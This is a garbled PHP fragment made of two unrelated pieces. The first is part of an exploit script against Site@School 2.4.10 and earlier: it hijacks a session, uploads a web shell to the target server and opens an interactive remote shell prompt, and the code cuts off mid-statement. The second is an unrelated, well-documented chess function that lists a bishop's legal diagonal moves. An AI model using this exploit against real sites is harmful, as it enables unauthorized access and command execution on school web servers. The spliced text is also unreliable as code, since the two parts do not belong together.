die("not vulnerable!\n\n[-] Exploit failed...probably magic_quotes_gpc = on\n"); } $prefix = $match[1]; } print "\n+-----------------------------------------------------------------------+"; print "\n| Site@School <= 2.4.10 Session Hijacking / File Upload Exploit by EgiX |"; print "\n+-----------------------------------------------------------------------+\n"; if ($argc < 3) { print "\nUsage...: php {$argv['0']} host path \n"; print "\nhost....: target server (ip/hostname)"; print "\npath....: path to sas directory\n"; die; } $host = $argv[1]; $path = $argv[2]; check_target(); $sid = get_sid(); if (empty($sid)) { die("\n[-] Session id not found! Try later...\n"); } else { print "\n[-] Hijacking with sid {$sid}\n"; } if (!($ext = upload())) { die("\n[-] Exploit failed...\n"); } else { print "\n[-] Shell uploaded...starting it!\n"; } while (1) { print "\nsas-shell# "; $cmd = trim(fgets(STDIN)); if ($cmd != "exit") {
/**
 * Build the list of fields a bishop standing on $field can move to.
 *
 * The result always starts with $field itself (kept for the deselection
 * link), followed by every reachable field. The four diagonals are probed
 * outwards one step at a time, for distances 1 through 7, in this order per
 * distance: (+row, +col), (-row, -col), (+row, -col), (-row, +col).
 * A diagonal is abandoned after the first opponent piece (which is still
 * included in the result) or as soon as check_target() reports anything
 * other than EMPTY_FIELD or OPPONENTS_PIECE.
 *
 * @param mixed $board_array    Board state; passed unchanged to check_target().
 * @param mixed $current_player Player to move; passed unchanged to check_target().
 * @param mixed $field          Field identifier accepted by field_to_rowcol().
 *
 * @return array The origin field followed by the reachable target fields.
 */
function bishop_move_list($board_array, $current_player, $field)
{
    $moves = array($field); // origin first, for the deselection link
    list($row, $col) = field_to_rowcol($field);

    // Diagonal step vectors, in the order each distance is probed.
    $steps = array(
        array(1, 1),
        array(-1, -1),
        array(1, -1),
        array(-1, 1),
    );
    // One flag per diagonal: true while that diagonal is still unobstructed.
    $open = array(true, true, true, true);

    for ($dist = 1; $dist < 8; $dist++) {
        foreach ($steps as $idx => $step) {
            if (!$open[$idx]) {
                continue;
            }

            $r = $row + $dist * $step[0];
            $c = $col + $dist * $step[1];
            $target = check_target($board_array, $current_player, $r, $c);
            $isCapture = ($target == OPPONENTS_PIECE);

            if (!($isCapture || $target == EMPTY_FIELD)) {
                // Neither empty nor capturable: this diagonal ends here.
                $open[$idx] = false;
                continue;
            }

            $moves[] = rowcol_to_field($r, $c);

            if ($isCapture) {
                // The captured piece's field is reachable, nothing beyond it is.
                $open[$idx] = false;
            }
        }
    }

    return $moves;
}